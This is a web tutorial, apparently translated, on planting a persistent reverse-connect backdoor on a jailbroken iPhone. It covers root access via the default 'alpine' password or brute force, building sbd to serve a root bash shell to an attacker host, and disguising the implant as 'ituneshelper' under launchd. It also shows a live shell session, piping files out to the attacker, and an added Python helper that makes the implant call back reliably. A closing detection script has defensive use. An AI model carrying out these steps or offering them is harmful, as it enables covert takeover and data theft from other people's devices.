
Leaving a persistent reverse-connect backdoor on an iPhone/iPad

Published: 2013-01-14 20:58  Source: web  Author: anonymous (秩名)
Abstract: To leave a backdoor you first have to get onto the device. After a jailbreak the OpenSSH default account is root with password alpine. Get in over SSH, by brute force, or with physical access, whatever gets you there. We can use Michel Blomgren's sbd-1.36 backdoor (TCP/IP only). 1. Install iphone-gcc...

 

To leave a backdoor you first have to get onto the device. After a jailbreak the OpenSSH package comes with the default account root and password alpine; whether you log in over SSH with that, brute-force it, or use physical access does not matter, as long as you end up with a root shell.
We will use Michel Blomgren's sbd-1.36 backdoor (sbd speaks TCP/IP only).
1. Install iphone-gcc and make:
iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg

iphone4:~ root# apt-get install iphone-gcc
Reading package lists… Done
Building dependency tree
Reading state information… Done

Setting up ldid (610-5) …
Setting up com.sull.iphone-gccheaders (1.0-11) …
Setting up com.sull.fake-libgcc (1.0-2) …
Setting up iphone-gcc (4.2-20080604-1-8) …
iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists… Done
Building dependency tree
Reading state information… Done

Unpacking make (from …/make_3.81-2_iphoneos-arm.deb) …
Setting up make (3.81-2) …


2. Download the backdoor:
iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43--  http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'
100%[======================================>] 84,093 66.3K/s in 1.2s
2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]
iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h


3. Configure sbd in sbd.h (reverse-connect IP address and port, shared secret and encryption, reconnect interval, and so on; these are compile-time settings, so edit them before running make):
iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"
/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
 * reconnect every 10 seconds.
 */
#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"
Alternatively, the same settings can be passed on the command line instead of being compiled in. The -k secret must match on both ends. -D on forks sbd into the background, which is fine when you start it by hand but wrong when launchd starts it (launchd treats a job that forks and exits as finished), so leave -D off in that case:
listener (attacker host): ./sbd -l -p 443 -k 1234
phone (serves the shell): ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443


4. Compile (source: 云安全 http://www.yunsec.net)
iphone4:~/sbd-1.36 root# make
usage:
make unix – Linux, NetBSD, FreeBSD, OpenBSD
make sunos – SunOS (Solaris)
make win32 – native win32 console app (w/ Cygwin + MinGW)
make win32bg – create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH – stealthy no-console app
make mingw – native win32 console app (w/ MinGW MSYS)
make mingwbg – native win32 no-console app (w/ MinGW MSYS)
make cygwin – Cygwin console app
make darwin – Darwin
iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd
iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*


5. Run the backdoor. Copy the binary under an inconspicuous name and register it as a launchd daemon; launchd starts it at the next boot, or immediately if you run launchctl load /Library/LaunchDaemons/com.ituneshelper.start.plist. DAEMONIZE 0 in sbd.h matters here: the process must stay in the foreground for launchd to track it, and RESPAWN_ENABLED 1 makes sbd itself retry the connection every 10 seconds.
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
iphone4:/Library/LaunchDaemons root# cat << EOF > com.ituneshelper.start.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.ituneshelper.start</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/ituneshelper</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>1</integer>
</dict>
</plist>
EOF
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
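The sbd.h defines from step 3 and the launchd job from step 5 are two halves of one mechanism, and a mismatch between them, or with the listener's -k, is the usual reason a freshly installed implant never calls back. The following is an added example written for this page; it is not part of the article and not sbd's own code. It works on a constructed excerpt of sbd.h (the real header has more defines), rewrites the connect-back settings, renders the plist with Python's plistlib instead of a hand-typed heredoc, and cross-checks the three pieces before anything is copied to the phone.

```python
import plistlib
import re

# Constructed excerpt of sbd-1.36's sbd.h: only the defines this procedure
# touches, with the article's values. The real header carries more.
SBD_H = """\
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define DAEMONIZE 0
#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"
"""


def set_define(text, name, value):
    """Rewrite '#define NAME <anything>' in a C header; value is inserted verbatim."""
    pat = re.compile(r"^#define[ \t]+" + re.escape(name) + r"[ \t]+.*$", re.M)
    if not pat.search(text):
        raise KeyError("no #define %s in header" % name)
    return pat.sub("#define %s %s" % (name, value), text)


def read_defines(text):
    """Map define names to values, with surrounding double quotes removed."""
    out = {}
    for m in re.finditer(r"^#define[ \t]+(\w+)[ \t]+(.*?)[ \t]*$", text, re.M):
        out[m.group(1)] = m.group(2).strip('"')
    return out


def patch_for_connect_back(text, host, port, secret, interval=10):
    """Compile-time equivalent of: sbd -r <interval> -e /bin/bash -k <secret> <host> <port>
    (deliberately without -D: under launchd the process must stay in the foreground)."""
    for name, value in (("DOLISTEN", "0"), ("HOST", '"%s"' % host), ("PORT", str(port)),
                        ("SHARED_SECRET", '"%s"' % secret), ("RESPAWN_ENABLED", "1"),
                        ("RESPAWN_INTERVAL", str(interval)), ("DAEMONIZE", "0")):
        text = set_define(text, name, value)
    return text


def launchd_job(label, program, start_interval=None):
    """Serialize the LaunchDaemons plist from step 5 as real plist XML."""
    job = {"Label": label, "ProgramArguments": [program], "RunAtLoad": True}
    if start_interval is not None:
        job["StartInterval"] = start_interval
    return plistlib.dumps(job)


def check_persistence(defines, plist_bytes, listener_secret, installed_path):
    """Cross-check header, plist and listener. Each string returned is a reason the
    implant would never call back or would misbehave under launchd."""
    job = plistlib.loads(plist_bytes)
    problems = []
    if defines.get("DOLISTEN") != "0":
        problems.append("DOLISTEN is not 0: the binary would listen instead of connecting back")
    if defines.get("RESPAWN_ENABLED") != "1":
        problems.append("RESPAWN_ENABLED is not 1: one failed connect and the process exits")
    if defines.get("DAEMONIZE") != "0":
        problems.append("DAEMONIZE is not 0: launchd sees a forking job as exited and relaunches it")
    if defines.get("SHARED_SECRET") != listener_secret:
        problems.append("SHARED_SECRET differs from the listener's -k: the encrypted session never comes up")
    if (job.get("ProgramArguments") or [None])[0] != installed_path:
        problems.append("plist ProgramArguments does not point at the installed binary")
    if not job.get("RunAtLoad"):
        problems.append("RunAtLoad missing: nothing starts the job at boot")
    if "StartInterval" not in job and "KeepAlive" not in job:
        problems.append("neither StartInterval nor KeepAlive: a killed process is never restarted")
    return problems


if __name__ == "__main__":
    hdr = patch_for_connect_back(SBD_H, "192.168.200.22", 443, "password")
    plist = launchd_job("com.ituneshelper.start", "/usr/bin/ituneshelper", start_interval=1)
    print(hdr)
    print(plist.decode())
    print("problems:", check_persistence(read_defines(hdr), plist, "password",
                                         "/usr/bin/ituneshelper"))
```

Apply the patched text to the real sbd.h before make darwin, write the plist bytes to /Library/LaunchDaemons/com.ituneshelper.start.plist, and run the check once more against the -k you will actually give the listener.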


6. Connect to the target. Start the listener on 192.168.200.22 with the same shared secret; the phone calls back within RESPAWN_INTERVAL seconds and sbd hands over /bin/bash without a pty, which is why /bin/bash -i is typed below to get a prompt. In the ps -ef listing note the chain launchd -> /usr/bin/ituneshelper (PID 94) -> bash (286) -> /bin/bash -i (300): that parent chain is what gives the implant away to anyone looking.
root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
root@coresec:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:03:72:5e
inet addr:192.168.200.22 Bcast:192.168.200.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20159805 (20.1 MB) TX bytes:720669 (720.6 KB)
root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef
bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

7. File transfer. The listener on the attacker host writes whatever arrives to a file, and the phone pipes the file into sbd; the -k secret must match on both ends:
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file
iphone4:~/sbd-1.36 root# cat /…/…/input.file | ./sbd -k secret 192.168.200.22 12345

8. Remove the backdoor. Deleting the plist and the binary only stops it from coming back at the next boot; the running instance keeps its connection until you unload the job (launchctl unload /Library/LaunchDaemons/com.ituneshelper.start.plist), kill it, or reboot.
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper
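Seen from the other side, the implant leaves two artifacts that steps 5 and 6 show in full: a root daemon started by launchd from a path no package owns, which in turn parents a shell, and a LaunchDaemons plist pointing at that same path. The following added example (written for this page, not from the article) hunts for both on copies of the ps -ef listing and the plists taken off the device, and can also serve as the "is it really gone" check after step 8. The listing, the plists and the trust lists below are constructed stand-ins; on a real device the package-owned set comes from dpkg -S, and the sshd plist differs from the one sketched here.

```python
import os
import plistlib

# Constructed excerpt of the step 6 `ps -ef` listing, same column layout.
PS_SAMPLE = """\
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef
"""

# Constructed stand-ins for the two plists in /Library/LaunchDaemons (step 5);
# the real com.openssh.sshd.plist differs, only ProgramArguments matters here.
PLISTS = {
    "com.openssh.sshd.plist": plistlib.dumps(
        {"Label": "com.openssh.sshd", "ProgramArguments": ["/usr/sbin/sshd"]}),
    "com.ituneshelper.start.plist": plistlib.dumps(
        {"Label": "com.ituneshelper.start", "ProgramArguments": ["/usr/bin/ituneshelper"],
         "RunAtLoad": True, "StartInterval": 1}),
}

# Where Apple's own daemons live; anything elsewhere (notably /usr/bin, where the
# article dropped the implant) must be vouched for by the package database.
# PACKAGE_OWNED is a constructed stand-in for `dpkg -S <path>` answers.
APPLE_PREFIXES = ("/sbin/", "/usr/sbin/", "/usr/libexec/", "/System/Library/", "/Applications/")
PACKAGE_OWNED = frozenset({"/usr/bin/sbsettingsd", "/usr/sbin/sshd"})
SHELLS = {"sh", "bash", "zsh", "ksh"}


def trusted(path, package_owned):
    return path.startswith(APPLE_PREFIXES) or path in package_owned


def parse_ps(text):
    """UID PID PPID C STIME TTY TIME CMD -> {pid: {uid, ppid, exe, cmd}}."""
    procs = {}
    for line in text.strip().splitlines()[1:]:
        f = line.split(None, 7)
        procs[int(f[1])] = {"uid": int(f[0]), "ppid": int(f[2]),
                            "exe": f[7].split()[0], "cmd": f[7]}
    return procs


def launchd_child(procs, pid):
    """Walk the PPID chain up to the ancestor that launchd (PID 1) started."""
    while pid in procs and procs[pid]["ppid"] != 1:
        pid = procs[pid]["ppid"]
    return pid if pid in procs else None


def hunt(ps_text, plists, package_owned=PACKAGE_OWNED):
    """Return (kind, where, path) findings for the three tells described above."""
    procs = parse_ps(ps_text)
    findings = []
    for pid, p in sorted(procs.items()):
        if p["uid"] == 0 and p["ppid"] == 1 and not trusted(p["exe"], package_owned):
            findings.append(("untrusted-root-daemon", pid, p["exe"]))
        if os.path.basename(p["exe"]) in SHELLS:
            top = launchd_child(procs, pid)
            if top is not None and not trusted(procs[top]["exe"], package_owned):
                findings.append(("shell-under-untrusted-daemon", pid, procs[top]["exe"]))
    for name, data in plists.items():
        args = plistlib.loads(data).get("ProgramArguments") or []
        if args and not trusted(args[0], package_owned):
            findings.append(("untrusted-launchdaemon", name, args[0]))
    return findings


if __name__ == "__main__":
    for kind, where, path in hunt(PS_SAMPLE, PLISTS):
        print("%-30s %-30s %s" % (kind, where, path))
```

The allowlist is the weak point: a Cydia tweak such as sbsettingsd lives in /usr/bin too and would be flagged without the package-owned set, so build that set from dpkg -S on the device rather than by hand, and treat a path dpkg reports as unowned, started by launchd as root, and parenting a shell, as the step 6 chain until proven otherwise.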
 
